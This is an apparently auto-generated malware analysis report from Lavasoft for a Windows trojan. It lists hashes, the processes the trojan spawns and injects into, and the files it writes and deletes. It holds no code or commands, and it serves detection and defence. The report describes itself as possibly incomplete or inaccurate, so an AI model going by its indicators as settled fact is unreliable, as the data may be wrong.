Skip to main content

Trojan.GenericKD.3142479_bfa0be4038

  • Updated

Trojan.Win32.Kovter.jqd (Kaspersky), Trojan.GenericKD.3142479 (AdAware), Trojan.Win32.Alureon.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

MD5: bfa0be4038c3d1ebbe7557be0cfac78c

SHA1: c6285115f1a9abac1727a4f55feae077920fb896

SHA256: c3330f66a33be8334221b6f4b8493609651a234786bdd8db9c8aa16ff971f2d1

SSDeep: 196608:X N2iXiJwxvBPyqTpMT4kgSL5e7UnowYP/j72cE1ZBn1bsalhJmnlG05oR:XzH61Bg4kt5e4nrYTSjBVsaHJmlG05oR

Size: 9304658 bytes

File type: EXE

Platform: WIN32

Entropy: Packed

PEID: UPolyXv05_v6

Company: no certificate found

Created at: 2012-02-24 21:20:04

Analyzed on: WindowsXP SP3 32-bit

Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Dynamic Analysis

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

csc.exe:1992
csc.exe:888
csc.exe:444
csc.exe:1532
csc.exe:544
csc.exe:2008
csc.exe:332
csc.exe:1752
csc.exe:1512
07-04-2016_hwopt_3.0.10-1.tmp:432
MSIF2.tmp:3740
netsh.exe:652
netsh.exe:2084
InstallUtil.exe:1744
InstallUtil.exe:2024
clicker.exe:2312
clicker.exe:2452
sc.exe:716
sc.exe:588
sc.exe:2000
sc.exe:456
sc.exe:504
sc.exe:1752
WindowsXP-KB968930-x86-ENG.exe:3496
master.exe:1488
mscorsvw.exe:4020
mscorsvw.exe:3616
mscorsvw.exe:2948
mscorsvw.exe:3756
mscorsvw.exe:2196
mscorsvw.exe:3536
mscorsvw.exe:3676
mscorsvw.exe:3044
mscorsvw.exe:2544
mscorsvw.exe:2564
mscorsvw.exe:1856
mscorsvw.exe:3180
mscorsvw.exe:2660
mscorsvw.exe:2508
mscorsvw.exe:2680
mscorsvw.exe:2872
mscorsvw.exe:3832
mscorsvw.exe:3872
mscorsvw.exe:304
mscorsvw.exe:224
mscorsvw.exe:1556
mscorsvw.exe:2536
mscorsvw.exe:2000
mscorsvw.exe:2412
mscorsvw.exe:2064
wsmanhttpconfig.exe:2848
wsmanhttpconfig.exe:2452
MsiExec.exe:3168
MsiExec.exe:2812
%original file name%.exe:1328
update.exe:3572
PSCustomSetupUtil.exe:2428
PSCustomSetupUtil.exe:3452
PSCustomSetupUtil.exe:3416
PSCustomSetupUtil.exe:2800
PSCustomSetupUtil.exe:3068
PSCustomSetupUtil.exe:3232
PSCustomSetupUtil.exe:2300
PSCustomSetupUtil.exe:2484
PSCustomSetupUtil.exe:2548
PSCustomSetupUtil.exe:3344
PSCustomSetupUtil.exe:2388
PSCustomSetupUtil.exe:2288
PSCustomSetupUtil.exe:3664
PSCustomSetupUtil.exe:2600
PSCustomSetupUtil.exe:2876
PSCustomSetupUtil.exe:3884
PSCustomSetupUtil.exe:2284
PSCustomSetupUtil.exe:3932
PSCustomSetupUtil.exe:2976
PSCustomSetupUtil.exe:3704
PSCustomSetupUtil.exe:3544
PSCustomSetupUtil.exe:3140
PSCustomSetupUtil.exe:3784
PSCustomSetupUtil.exe:3224
PSCustomSetupUtil.exe:3984
PSCustomSetupUtil.exe:3848
regsvr32.exe:3056
regsvr32.exe:2644
summit_sharma.exe:2672
07-04-2016_hwopt_3.0.10-1.exe:1632
XBLive.exe:3008
InstallationStatsUploder_12052016001648.exe:2044
InstallationStatsUploder_12052016001648.exe:1488
InstallationStatsUploder_12052016001648.exe:580
InstallationStatsUploder_12052016001648.exe:1636
InstallationStatsUploder_12052016001648.exe:1860
InstallationStatsUploder_12052016001648.exe:1612
InstallationStatsUploder_12052016001648.exe:640
InstallationStatsUploder_12052016001648.exe:1848
InstallationStatsUploder_12052016001648.exe:508
InstallationStatsUploder_12052016001648.exe:1292
InstallationStatsUploder_12052016001648.exe:1400
EditBinx86.exe:960
EditBinx86.exe:2012
mofcomp.exe:2684
ngen.exe:332
ngen.exe:276
ngen.exe:2092
ngen.exe:3300
ngen.exe:2136
ngen.exe:3212
ngen.exe:2056
ngen.exe:3340
ngen.exe:2248
ngen.exe:3160
ngen.exe:2112
ngen.exe:2240
ngen.exe:3232
ngen.exe:444
ngen.exe:1496
ngen.exe:2188
ngen.exe:2212
ngen.exe:2276
ngen.exe:780
ngen.exe:3224
ngen.exe:2024
ngen.exe:2160
ngen.exe:2148
runonce.exe:3520
cvtres.exe:308
cvtres.exe:1968
cvtres.exe:1556
cvtres.exe:952
cvtres.exe:1064
cvtres.exe:340
cvtres.exe:164
cvtres.exe:504
cvtres.exe:364
Osman_Navigation.exe:4072
PSSetupNativeUtils.exe:968
fileman.exe:1636
mastermind.exe:3740
grpconv.exe:3484

The Trojan injects its code into the following process(es):

hwopt12052016001648_updater_service.exe:380
regsvr32.exe:2700
regsvr32.exe:2952
hwopt12052016001648.exe:912

Mutexes

The following mutexes were created/opened:No objects were found.

File activity

The process csc.exe:1992 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\pgamidov.dll (4150 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSCF.tmp (664 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pgamidov.out (396 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\RES10.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSCF.tmp (0 bytes)

The process csc.exe:888 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\2q171lzo.dll (4150 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2q171lzo.out (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSCB.tmp (664 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\RESC.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSCB.tmp (0 bytes)

The process csc.exe:444 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\CSC7.tmp (664 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4_rcyvsa.dll (4150 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4_rcyvsa.out (396 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\CSC7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RES8.tmp (0 bytes)

The process csc.exe:1532 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\kgul_apy.dll (4150 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSCD.tmp (664 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\kgul_apy.out (396 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\RESE.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSCD.tmp (0 bytes)

The process csc.exe:544 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\8sqkbrnw.out (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSC5.tmp (664 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\8sqkbrnw.dll (4150 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\CSC5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RES6.tmp (0 bytes)

The process csc.exe:2008 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\xlrctlov.out (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSC11.tmp (664 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\xlrctlov.dll (4150 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\CSC11.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RES12.tmp (0 bytes)

The process csc.exe:332 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Temp\4p64sgqi.dll (4150 bytes)
%WinDir%\Temp\4p64sgqi.out (396 bytes)
%WinDir%\Temp\CSC13.tmp (664 bytes)

The Trojan deletes the following file(s):

%WinDir%\Temp\CSC13.tmp (0 bytes)
%WinDir%\Temp\RES14.tmp (0 bytes)

The process csc.exe:1752 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\uuxr7wdt.out (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSC3.tmp (664 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\uuxr7wdt.dll (4150 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\RES4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSC3.tmp (0 bytes)

The process csc.exe:1512 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\CSC9.tmp (664 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\spcebjga.dll (4150 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\spcebjga.out (396 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\CSC9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RESA.tmp (0 bytes)

The process 07-04-2016_hwopt_3.0.10-1.tmp:432 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\EditBinx86.exe (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\x86_WinDivert.zip (9 bytes)
%WinDir%\hwopt_12052016001648\unins000.dat (9300 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-SG5DG.tmp (5873 bytes)
%WinDir%\hwopt_12052016001648\Utils.dll (57 bytes)
%WinDir%\hwopt_12052016001648\is-JSA3M.tmp (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\is-39PQT.tmp (28 bytes)
%WinDir%\hwopt_12052016001648\is-3HV2J.tmp (28 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-11RFO.tmp (601 bytes)
%WinDir%\hwopt_12052016001648\addon\is-RR6J5.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\is-QADEL.tmp (9 bytes)
%WinDir%\hwopt_12052016001648\is-NGNQK.tmp (6841 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-KE3G3.tmp (5441 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-0GUHR.tmp (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\_isetup\_shfoldr.dll (23 bytes)
%WinDir%\hwopt_12052016001648\is-KKUTO.tmp (3361 bytes)
%WinDir%\hwopt_12052016001648\addon\is-H19H5.tmp (18 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-4A1SP.tmp (14 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-TJDF4.tmp (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp (4 bytes)
%WinDir%\hwopt_12052016001648\addon\is-TRQBO.tmp (12287 bytes)
%WinDir%\hwopt_12052016001648\addon\is-1J7I3.tmp (1 bytes)
%WinDir%\hwopt_12052016001648\is-7B37I.tmp (20 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-J0U8C.tmp (601 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-22OLL.tmp (2105 bytes)
%WinDir%\hwopt_12052016001648\is-480KO.tmp (31 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-37BTT.tmp (673 bytes)
%WinDir%\hwopt_12052016001648\addon\is-3PU0B.tmp (5441 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\fileman.exe (673 bytes)
%WinDir%\hwopt_12052016001648\addon\is-NUNLD.tmp (985 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-VTGNO.tmp (601 bytes)
%WinDir%\hwopt_12052016001648\is-1JNQO.tmp (25361 bytes)
%WinDir%\hwopt_12052016001648\addon\is-B1DBC.tmp (673 bytes)
%WinDir%\hwopt_12052016001648\addon\is-SVUH5.tmp (424 bytes)
%WinDir%\hwopt_12052016001648\addon\is-FLV5J.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\Utilsx86.dll (57 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-FCRIP.tmp (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\is-LKUF0.tmp (57 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-SI3J3.tmp (673 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-PL8C4.tmp (1281 bytes)
%WinDir%\hwopt_12052016001648\addon\is-4S0ED.tmp (31 bytes)
%WinDir%\hwopt_12052016001648\addon\is-DNIFE.tmp (6841 bytes)
%WinDir%\hwopt_12052016001648\addon\is-HP0LE.tmp (1 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-LS6F4.tmp (6841 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\is-ADFMM.tmp (673 bytes)
%WinDir%\hwopt_12052016001648\is-V18V5.tmp (16 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-5O5GC.tmp (1281 bytes)
%WinDir%\hwopt_12052016001648\is-LDP3M.tmp (2321 bytes)
%WinDir%\hwopt_12052016001648\is-2JF6C.tmp (16 bytes)
%WinDir%\hwopt_12052016001648\addon\is-H96Q4.tmp (7345 bytes)
%WinDir%\hwopt_12052016001648\WinDivert.dll (18 bytes)
%WinDir%\hwopt_12052016001648\addon\is-T8IBT.tmp (7971 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\EditBinx86.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\_isetup\_shfoldr.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\WinDivert.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\fileman.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\_isetup (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\x86_WinDivert.zip (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\Utilsx86.dll (0 bytes)

The process InstallUtil.exe:1744 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\hwopt_12052016001648\hwopt12052016001648.InstallLog (732 bytes)
%System%\config\SYSTEM.LOG (4777 bytes)
%WinDir%\hwopt_12052016001648\hwopt12052016001648.InstallState (196 bytes)
%System%\config\system (1723 bytes)
C:\$Directory (288 bytes)
%WinDir%\hwopt_12052016001648\InstallUtil.InstallLog (672 bytes)

The process InstallUtil.exe:2024 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%System%\config\system (2397 bytes)
%WinDir%\hwopt_12052016001648\hwopt12052016001648_updater_service.InstallState (196 bytes)
%System%\config (288 bytes)
%System%\config\SYSTEM.LOG (4793 bytes)
%WinDir%\hwopt_12052016001648\hwopt12052016001648_updater_service.InstallLog (876 bytes)
%WinDir%\hwopt_12052016001648\InstallUtil.InstallLog (1311 bytes)

The process clicker.exe:2312 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\b_dk.jpg (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw16.tmp (7405 bytes)
%Documents and Settings%\%current user%\Application Data\chapter.gif (7192 bytes)
%Documents and Settings%\%current user%\Application Data\1.png (234 bytes)
%Documents and Settings%\%current user%\Application Data\28.svg (1 bytes)
%Documents and Settings%\%current user%\Application Data\TerraceSawwortSouthernwood (2 bytes)
%Documents and Settings%\%current user%\Application Data\septillions.dll (6 bytes)
%Documents and Settings%\%current user%\Application Data\System.dll (11 bytes)
%Documents and Settings%\%current user%\Application Data\make.graphic.viewport.xml (1 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsw15.tmp (0 bytes)

The process WindowsXP-KB968930-x86-ENG.exe:3496 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

C:\f1fab1e3e4f7fec893e8\update\update.exe (10748 bytes)
C:\f1fab1e3e4f7fec893e8\about_language_keywords.help.txt (11 bytes)
C:\f1fab1e3e4f7fec893e8\update (4 bytes)
C:\f1fab1e3e4f7fec893e8\about_if.help.txt (3 bytes)
C:\f1fab1e3e4f7fec893e8\windowsremotemanagement.adm (574 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.editor.dll (14450 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.backgroundintelligenttransfer.management.interop.dll (1532 bytes)
C:\f1fab1e3e4f7fec893e8\about_modules.help.txt (13 bytes)
C:\f1fab1e3e4f7fec893e8\update\updspapi.dll (5940 bytes)
C:\f1fab1e3e4f7fec893e8\winrm.cmd (35 bytes)
C:\f1fab1e3e4f7fec893e8\system.management.automation.dll-help.xml (16567 bytes)
C:\f1fab1e3e4f7fec893e8\about_scripts.help.txt (12 bytes)
C:\f1fab1e3e4f7fec893e8\about_wildcards.help.txt (3 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.backgroundintelligenttransfer.management.dll (1537 bytes)
C:\f1fab1e3e4f7fec893e8\about_aliases.help.txt (6 bytes)
C:\f1fab1e3e4f7fec893e8\about_type_operators.help.txt (5 bytes)
C:\f1fab1e3e4f7fec893e8\registry.format.ps1xml (20 bytes)
C:\f1fab1e3e4f7fec893e8\about_try_catch_finally.help.txt (7 bytes)
C:\f1fab1e3e4f7fec893e8\wsmauto.mof (4 bytes)
C:\f1fab1e3e4f7fec893e8\about_regular_expressions.help.txt (5 bytes)
C:\f1fab1e3e4f7fec893e8\about_methods.help.txt (6 bytes)
C:\f1fab1e3e4f7fec893e8\winrm.ini (1956 bytes)
C:\f1fab1e3e4f7fec893e8\types.ps1xml (2510 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.security.resources.dll (9 bytes)
C:\f1fab1e3e4f7fec893e8\wtrinstaller.ico (4803 bytes)
C:\f1fab1e3e4f7fec893e8\wsmprovhost.exe (657 bytes)
C:\f1fab1e3e4f7fec893e8\about_while.help.txt (2 bytes)
C:\f1fab1e3e4f7fec893e8\about_parsing.help.txt (2 bytes)
C:\f1fab1e3e4f7fec893e8\wsman.format.ps1xml (837 bytes)
C:\f1fab1e3e4f7fec893e8\dotnettypes.format.ps1xml (266 bytes)
C:\f1fab1e3e4f7fec893e8\about_trap.help.txt (10 bytes)
C:\$Directory (800 bytes)
C:\f1fab1e3e4f7fec893e8\about_bits_cmdlets.help.txt (7 bytes)
C:\f1fab1e3e4f7fec893e8\spuninst.exe (3787 bytes)
C:\f1fab1e3e4f7fec893e8\about_script_internationalization.help.txt (9 bytes)
C:\f1fab1e3e4f7fec893e8\system.management.automation.resources.dll (3153 bytes)
C:\f1fab1e3e4f7fec893e8\powershell_ise.exe (2526 bytes)
C:\f1fab1e3e4f7fec893e8\pssetupnativeutils.exe (9 bytes)
C:\f1fab1e3e4f7fec893e8\wsmauto.dll (1842 bytes)
C:\f1fab1e3e4f7fec893e8\powershellcore.format.ps1xml (1492 bytes)
C:\f1fab1e3e4f7fec893e8\pspluginwkr.dll (1756 bytes)
C:\f1fab1e3e4f7fec893e8\powershelltrace.format.ps1xml (344 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.diagnostics.dll-help.xml (2301 bytes)
C:\f1fab1e3e4f7fec893e8\about_do.help.txt (2 bytes)
C:\f1fab1e3e4f7fec893e8\about_variables.help.txt (6 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.utility.resources.dll (508 bytes)
C:\f1fab1e3e4f7fec893e8\update\update.inf (2457 bytes)
C:\f1fab1e3e4f7fec893e8\about_path_syntax.help.txt (5 bytes)
C:\f1fab1e3e4f7fec893e8\winrmprov.mof (789 bytes)
C:\f1fab1e3e4f7fec893e8\about_operators.help.txt (770 bytes)
C:\f1fab1e3e4f7fec893e8\about_reserved_words.help.txt (1 bytes)
C:\f1fab1e3e4f7fec893e8\about_parameters.help.txt (9 bytes)
C:\f1fab1e3e4f7fec893e8\windowsremoteshell.adm (12 bytes)
C:\f1fab1e3e4f7fec893e8\compiledcomposition.microsoft.powershell.gpowershell.dll (1737 bytes)
C:\f1fab1e3e4f7fec893e8\about_types.ps1xml.help.txt (481 bytes)
C:\f1fab1e3e4f7fec893e8\about_pssession_details.help.txt (9 bytes)
C:\f1fab1e3e4f7fec893e8\about_ref.help.txt (1 bytes)
C:\f1fab1e3e4f7fec893e8\default.help.txt (2 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.wsman.runtime.dll (33 bytes)
C:\f1fab1e3e4f7fec893e8\about_transactions.help.txt (1011 bytes)
C:\f1fab1e3e4f7fec893e8\about_comment_based_help.help.txt (595 bytes)
C:\f1fab1e3e4f7fec893e8\about_pssnapins.help.txt (6 bytes)
C:\f1fab1e3e4f7fec893e8\about_core_commands.help.txt (221 bytes)
C:\f1fab1e3e4f7fec893e8\eventforwarding.adm (2 bytes)
C:\f1fab1e3e4f7fec893e8\about_format.ps1xml.help.txt (17 bytes)
C:\f1fab1e3e4f7fec893e8\about_hash_tables.help.txt (6 bytes)
C:\f1fab1e3e4f7fec893e8\pwrshplugin.dll (802 bytes)
C:\f1fab1e3e4f7fec893e8\about_eventlogs.help.txt (5 bytes)
C:\f1fab1e3e4f7fec893e8\certificate.format.ps1xml (155 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.management.resources.dll (508 bytes)
C:\f1fab1e3e4f7fec893e8\about_ws-management_cmdlets.help.txt (405 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.gpowershell.dll (9738 bytes)
C:\f1fab1e3e4f7fec893e8\importallmodules.psd1 (438 bytes)
C:\f1fab1e3e4f7fec893e8\pwrshsip.dll (24 bytes)
C:\f1fab1e3e4f7fec893e8\about_remote_troubleshooting.help.txt (146 bytes)
C:\f1fab1e3e4f7fec893e8\wsmwmipl.dll (2816 bytes)
C:\f1fab1e3e4f7fec893e8\about_requires.help.txt (2 bytes)
C:\f1fab1e3e4f7fec893e8\about_command_syntax.help.txt (5 bytes)
C:\f1fab1e3e4f7fec893e8\about_remote_faq.help.txt (775 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.gpowershell.resources.dll (408 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.management.dll (3386 bytes)
C:\f1fab1e3e4f7fec893e8\about_wmi_cmdlets.help.txt (8 bytes)
C:\f1fab1e3e4f7fec893e8\about_functions_advanced_methods.help.txt (9 bytes)
C:\f1fab1e3e4f7fec893e8\getevent.types.ps1xml (15 bytes)
C:\f1fab1e3e4f7fec893e8\about_split.help.txt (10 bytes)
C:\f1fab1e3e4f7fec893e8\wsmsvc.dll (15909 bytes)
C:\f1fab1e3e4f7fec893e8\profile.ps1 (772 bytes)
C:\f1fab1e3e4f7fec893e8\about_locations.help.txt (794 bytes)
C:\f1fab1e3e4f7fec893e8\about_pipelines.help.txt (411 bytes)
C:\f1fab1e3e4f7fec893e8\pwrshmsg.dll (4 bytes)
C:\f1fab1e3e4f7fec893e8\winrsmgr.dll (2 bytes)
C:\f1fab1e3e4f7fec893e8\update\spcustom.dll (23 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.consolehost.dll-help.xml (900 bytes)
C:\f1fab1e3e4f7fec893e8\about_functions_advanced_parameters.help.txt (962 bytes)
C:\f1fab1e3e4f7fec893e8\about_remote.help.txt (7 bytes)
C:\f1fab1e3e4f7fec893e8\wsmpty.xsl (1 bytes)
C:\f1fab1e3e4f7fec893e8\update\update.ver (14 bytes)
C:\f1fab1e3e4f7fec893e8\about_properties.help.txt (7 bytes)
C:\f1fab1e3e4f7fec893e8\about_break.help.txt (792 bytes)
C:\f1fab1e3e4f7fec893e8\about_quoting_rules.help.txt (659 bytes)
C:\f1fab1e3e4f7fec893e8\spupdsvc.exe (287 bytes)
C:\f1fab1e3e4f7fec893e8\about_functions_advanced.help.txt (3 bytes)
C:\f1fab1e3e4f7fec893e8\wsmtxt.xsl (2 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.utility.dll (9684 bytes)
C:\f1fab1e3e4f7fec893e8\about_redirection.help.txt (2 bytes)
C:\f1fab1e3e4f7fec893e8\winrs.exe (1154 bytes)
C:\f1fab1e3e4f7fec893e8\help.format.ps1xml (3947 bytes)
C:\f1fab1e3e4f7fec893e8\wsmres.dll (6164 bytes)
C:\f1fab1e3e4f7fec893e8\winrssrv.dll (12 bytes)
C:\f1fab1e3e4f7fec893e8\about_continue.help.txt (1 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.wsman.management.dll (5010 bytes)
C:\f1fab1e3e4f7fec893e8\about_return.help.txt (3 bytes)
C:\f1fab1e3e4f7fec893e8\about_objects.help.txt (2 bytes)
C:\f1fab1e3e4f7fec893e8\about_environment_variables.help.txt (417 bytes)
C:\f1fab1e3e4f7fec893e8\update\kb968930xp.cat (512 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.consolehost.resources.dll (778 bytes)
C:\f1fab1e3e4f7fec893e8\about_remote_jobs.help.txt (13 bytes)
C:\f1fab1e3e4f7fec893e8\bitstransfer.psd1 (950 bytes)
C:\f1fab1e3e4f7fec893e8\about_remote_requirements.help.txt (6 bytes)
C:\f1fab1e3e4f7fec893e8\about_remote_output.help.txt (887 bytes)
C:\f1fab1e3e4f7fec893e8\about_functions_cmdletbindingattribute.help.txt (3 bytes)
C:\f1fab1e3e4f7fec893e8\about_script_blocks.help.txt (3 bytes)
C:\f1fab1e3e4f7fec893e8\about_profiles.help.txt (457 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.diagnostics.resources.dll (470 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.wsman.management.resources.dll (13 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.consolehost.dll (3118 bytes)
C:\f1fab1e3e4f7fec893e8\winrscmd.dll (2907 bytes)
C:\f1fab1e3e4f7fec893e8\about_arrays.help.txt (8 bytes)
C:\f1fab1e3e4f7fec893e8\about_signing.help.txt (12 bytes)
C:\f1fab1e3e4f7fec893e8\about_automatic_variables.help.txt (14 bytes)
C:\f1fab1e3e4f7fec893e8\system.management.automation.dll (38414 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.utility.dll-help.xml (20810 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.graphicalhost.resources.dll (16 bytes)
C:\f1fab1e3e4f7fec893e8\spmsg.dll (495 bytes)
C:\f1fab1e3e4f7fec893e8\about_windows_powershell_ise.help.txt (6 bytes)
C:\f1fab1e3e4f7fec893e8\about_data_sections.help.txt (5 bytes)
C:\f1fab1e3e4f7fec893e8\about_providers.help.txt (59 bytes)
C:\f1fab1e3e4f7fec893e8\powershell_ise.resources.dll (4 bytes)
C:\f1fab1e3e4f7fec893e8\about_debuggers.help.txt (21 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.editor.resources.dll (562 bytes)
C:\f1fab1e3e4f7fec893e8\pscustomsetuputil.exe (316 bytes)
C:\f1fab1e3e4f7fec893e8\winrmprov.dll (591 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.diagnostics.dll (998 bytes)
C:\f1fab1e3e4f7fec893e8\diagnostics.format.ps1xml (590 bytes)
C:\f1fab1e3e4f7fec893e8\about_logical_operators.help.txt (2 bytes)
C:\f1fab1e3e4f7fec893e8\about_line_editing.help.txt (1 bytes)
C:\f1fab1e3e4f7fec893e8\about_command_precedence.help.txt (8 bytes)
C:\f1fab1e3e4f7fec893e8\filesystem.format.ps1xml (133 bytes)
C:\f1fab1e3e4f7fec893e8\powershell.exe.mui (10 bytes)
C:\f1fab1e3e4f7fec893e8\about_session_configurations.help.txt (276 bytes)
C:\f1fab1e3e4f7fec893e8\about_prompts.help.txt (7 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.security.dll (1145 bytes)
C:\f1fab1e3e4f7fec893e8\about_assignment_operators.help.txt (379 bytes)
C:\f1fab1e3e4f7fec893e8\$shtdwn$.req (788 bytes)
C:\f1fab1e3e4f7fec893e8\bitstransfer.format.ps1xml (16 bytes)
C:\f1fab1e3e4f7fec893e8\windowspowershellhelp.chm (26041 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.graphicalhost.dll (4408 bytes)
C:\f1fab1e3e4f7fec893e8\about_execution_policies.help.txt (13 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.wsman.management.dll-help.xml (8740 bytes)
C:\f1fab1e3e4f7fec893e8\about_switch.help.txt (489 bytes)
C:\f1fab1e3e4f7fec893e8\about_throw.help.txt (5 bytes)
